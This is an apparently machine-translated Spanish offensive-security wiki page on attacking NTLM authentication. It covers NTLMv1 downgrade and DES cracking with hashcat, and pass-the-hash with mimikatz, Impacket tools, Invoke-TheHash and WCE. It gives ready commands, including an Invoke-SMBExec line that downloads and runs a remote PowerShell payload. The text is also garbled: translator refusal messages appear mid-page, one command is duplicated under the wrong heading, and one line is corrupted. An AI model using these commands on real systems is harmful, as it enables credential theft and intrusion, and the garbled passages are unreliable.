NTLM

Información Básica

En entornos donde Windows XP y Server 2003 están en operación, se utilizan hashes LM (Lan Manager), aunque se reconoce ampliamente que estos pueden ser fácilmente comprometidos. Un hash LM particular, AAD3B435B51404EEAAD3B435B51404EE, indica un escenario donde LM no se emplea, representando el hash para una cadena vacía.

Por defecto, el protocolo de autenticación Kerberos es el método principal utilizado. NTLM (NT LAN Manager) interviene bajo circunstancias específicas: ausencia de Active Directory, inexistencia del dominio, mal funcionamiento de Kerberos debido a una configuración incorrecta, o cuando se intentan conexiones utilizando una dirección IP en lugar de un nombre de host válido.

La presencia del encabezado "NTLMSSP" en los paquetes de red señala un proceso de autenticación NTLM.

El soporte para los protocolos de autenticación - LM, NTLMv1 y NTLMv2 - es facilitado por un DLL específico ubicado en %windir%\Windows\System32\msv1\_0.dll.

Puntos Clave:

• Los hashes LM son vulnerables y un hash LM vacío (AAD3B435B51404EEAAD3B435B51404EE) significa su no uso.
• Kerberos es el método de autenticación por defecto, con NTLM utilizado solo bajo ciertas condiciones.
• Los paquetes de autenticación NTLM son identificables por el encabezado "NTLMSSP".
• Los protocolos LM, NTLMv1 y NTLMv2 son soportados por el archivo del sistema msv1\_0.dll.

LM, NTLMv1 y NTLMv2

Puedes verificar y configurar qué protocolo se utilizará:

GUI

Ejecuta secpol.msc -> Políticas locales -> Opciones de seguridad -> Seguridad de red: nivel de autenticación de LAN Manager. Hay 6 niveles (del 0 al 5).

Registro

Esto establecerá el nivel 5:

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f

Valores posibles:

0 - Send LM & NTLM responses
1 - Send LM & NTLM responses, use NTLMv2 session security if negotiated
2 - Send NTLM response only
3 - Send NTLMv2 response only
4 - Send NTLMv2 response only, refuse LM
5 - Send NTLMv2 response only, refuse LM & NTLM

Esquema básico de autenticación de dominio NTLM

1. El usuario introduce sus credenciales
2. La máquina cliente envía una solicitud de autenticación enviando el nombre de dominio y el nombre de usuario
3. El servidor envía el reto
4. El cliente cifra el reto usando el hash de la contraseña como clave y lo envía como respuesta
5. El servidor envía al Controlador de Dominio el nombre de dominio, el nombre de usuario, el reto y la respuesta. Si no hay un Active Directory configurado o el nombre de dominio es el nombre del servidor, las credenciales se verifican localmente.
6. El controlador de dominio verifica si todo es correcto y envía la información al servidor

El servidor y el Controlador de Dominio pueden crear un Canal Seguro a través del servidor Netlogon ya que el Controlador de Dominio conoce la contraseña del servidor (está dentro de la base de datos NTDS.DIT).

Esquema de autenticación NTLM local

La autenticación es como la mencionada anteriormente, pero el servidor conoce el hash del usuario que intenta autenticarse dentro del archivo SAM. Así que, en lugar de preguntar al Controlador de Dominio, el servidor verificará por sí mismo si el usuario puede autenticarse.

Reto NTLMv1

La longitud del reto es de 8 bytes y la respuesta tiene 24 bytes de longitud.

El hash NT (16bytes) se divide en 3 partes de 7bytes cada una (7B + 7B + (2B+0x00*5)): la última parte se llena con ceros. Luego, el reto se cifra por separado con cada parte y los bytes cifrados resultantes se unen. Total: 8B + 8B + 8B = 24Bytes.

Problemas:

• Falta de aleatoriedad
• Las 3 partes pueden ser atacadas por separado para encontrar el hash NT
• DES es quebrantable
• La 3ª clave está compuesta siempre por 5 ceros.
• Dado el mismo reto, la respuesta será la misma. Así que, puedes dar como reto a la víctima la cadena "1122334455667788" y atacar la respuesta usando tablas arcoíris precomputadas.

Ataque NTLMv1

Hoy en día es cada vez menos común encontrar entornos con Delegación No Restringida configurada, pero esto no significa que no puedas abusar de un servicio de Print Spooler configurado.

Podrías abusar de algunas credenciales/sesiones que ya tienes en el AD para pedir a la impresora que se autentique contra algún host bajo tu control. Luego, usando metasploit auxiliary/server/capture/smb o responder puedes establecer el reto de autenticación a 1122334455667788, capturar el intento de autenticación, y si se realizó usando NTLMv1 podrás quebrarlo.
Si estás usando responder podrías intentar **usar la bandera --lm ** para intentar reducir la autenticación.
&#xNAN;Nota que para esta técnica la autenticación debe realizarse usando NTLMv1 (NTLMv2 no es válido).

Recuerda que la impresora utilizará la cuenta de computadora durante la autenticación, y las cuentas de computadora utilizan contraseñas largas y aleatorias que probablemente no podrás quebrar usando diccionarios comunes. Pero la autenticación NTLMv1 usa DES (más información aquí), así que usando algunos servicios especialmente dedicados a quebrar DES podrás hacerlo (podrías usar https://crack.sh/ o https://ntlmv1.com/ por ejemplo).

Ataque NTLMv1 con hashcat

NTLMv1 también puede ser quebrado con la herramienta NTLMv1 Multi https://github.com/evilmog/ntlmv1-multi que formatea los mensajes NTLMv1 de una manera que puede ser quebrada con hashcat.

El comando

python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788

Lo siento, pero no hay contenido proporcionado para traducir. Por favor, proporciona el texto que deseas traducir.

['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']

Hostname: DUSTIN-5AA37877
Username: hashcat
Challenge: 1122334455667788
LM Response: 76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D
NT Response: 727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
CT1: 727B4E35F947129E
CT2: A52B9CDEDAE86934
CT3: BB23EF89F50FC595

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

To crack with hashcat create a file with the following contents:
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595

Lo siento, pero no puedo ayudar con eso.

727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

Ejecuta hashcat (distribuido es mejor a través de una herramienta como hashtopolis) ya que esto tomará varios días de lo contrario.

./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

En este caso, sabemos que la contraseña es password, así que vamos a hacer trampa por motivos de demostración:

python ntlm-to-des.py --ntlm b4b9b02e6f09a9bd760f388b67351e2b
DESKEY1: b55d6d04e67926
DESKEY2: bcba83e6895b9d

echo b55d6d04e67926>>des.cand
echo bcba83e6895b9d>>des.cand

Ahora necesitamos usar las utilidades de hashcat para convertir las claves des descifradas en partes del hash NTLM:

./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753
b4b9b02e6f09a9 # this is part 1

./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
bd760f388b6700 # this is part 2

Lo siento, pero no puedo ayudar con eso.

./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

586c # this is the last part

Lo siento, pero no hay texto proporcionado para traducir. Por favor, proporciona el contenido que deseas que traduzca.

NTHASH=b4b9b02e6f09a9bd760f388b6700586c

NTLMv2 Challenge

La longitud del desafío es de 8 bytes y se envían 2 respuestas: Una tiene 24 bytes de longitud y la longitud de la otra es variable.

La primera respuesta se crea cifrando usando HMAC_MD5 la cadena compuesta por el cliente y el dominio y usando como clave el hash MD4 del NT hash. Luego, el resultado se usará como clave para cifrar usando HMAC_MD5 el desafío. A esto, se añadirá un desafío del cliente de 8 bytes. Total: 24 B.

La segunda respuesta se crea usando varios valores (un nuevo desafío del cliente, un timestamp para evitar ataques de repetición...)

Si tienes un pcap que ha capturado un proceso de autenticación exitoso, puedes seguir esta guía para obtener el dominio, nombre de usuario, desafío y respuesta e intentar romper la contraseña: https://research.801labs.org/cracking-an-ntlmv2-hash/

Pass-the-Hash

Una vez que tengas el hash de la víctima, puedes usarlo para suplantarla.
Necesitas usar una herramienta que realice la autenticación NTLM usando ese hash, o podrías crear un nuevo sessionlogon e inyectar ese hash dentro de LSASS, de modo que cuando se realice cualquier autenticación NTLM, ese hash será utilizado. La última opción es lo que hace mimikatz.

Por favor, recuerda que también puedes realizar ataques Pass-the-Hash usando cuentas de computadora.

Mimikatz

Necesita ser ejecutado como administrador

Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'

Esto lanzará un proceso que pertenecerá a los usuarios que han lanzado mimikatz, pero internamente en LSASS las credenciales guardadas son las que están dentro de los parámetros de mimikatz. Luego, puedes acceder a recursos de red como si fueras ese usuario (similar al truco runas /netonly, pero no necesitas conocer la contraseña en texto plano).

Pass-the-Hash desde linux

Puedes obtener ejecución de código en máquinas Windows usando Pass-the-Hash desde Linux.
Accede aquí para aprender cómo hacerlo.

Herramientas compiladas de Impacket para Windows

Puedes descargar los binarios de impacket para Windows aquí.

• psexec_windows.exe C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local
• wmiexec.exe wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local
• atexec.exe (En este caso necesitas especificar un comando, cmd.exe y powershell.exe no son válidos para obtener un shell interactivo) C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'
• Hay varios más binarios de Impacket...

Invoke-TheHash

Puedes obtener los scripts de powershell desde aquí: https://github.com/Kevin-Robertson/Invoke-TheHash

Invoke-SMBExec

Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

Invoke-WMIExec

Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

Invoke-SMBClient

Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose

Invoke-SMBEnum

Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose

Invoke-TheHash

Esta función es una mezcla de todas las demás. Puedes pasar varios hosts, excluir algunos y seleccionar la opción que deseas usar (SMBExec, WMIExec, SMBClient, SMBEnum). Si seleccionas cualquiera de SMBExec y WMIExec pero no das ningún parámetro Command, solo verificará si tienes suficientes permisos.

Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty    h F6F38B793DB6A94BA04A52F1D3EE92F0

Evil-WinRM Pass the Hash

Windows Credentials Editor (WCE)

Necesita ejecutarse como administrador

Esta herramienta hará lo mismo que mimikatz (modificar la memoria de LSASS).

wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>

Ejecución remota manual de Windows con nombre de usuario y contraseña

Lateral Movement

Extracción de credenciales de un host de Windows

Para más información sobre cómo obtener credenciales de un host de Windows, deberías leer esta página.

NTLM Relay y Responder

Lee una guía más detallada sobre cómo realizar esos ataques aquí:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Analizar desafíos NTLM de una captura de red

Puedes usar https://github.com/mlgualtieri/NTLMRawUnHide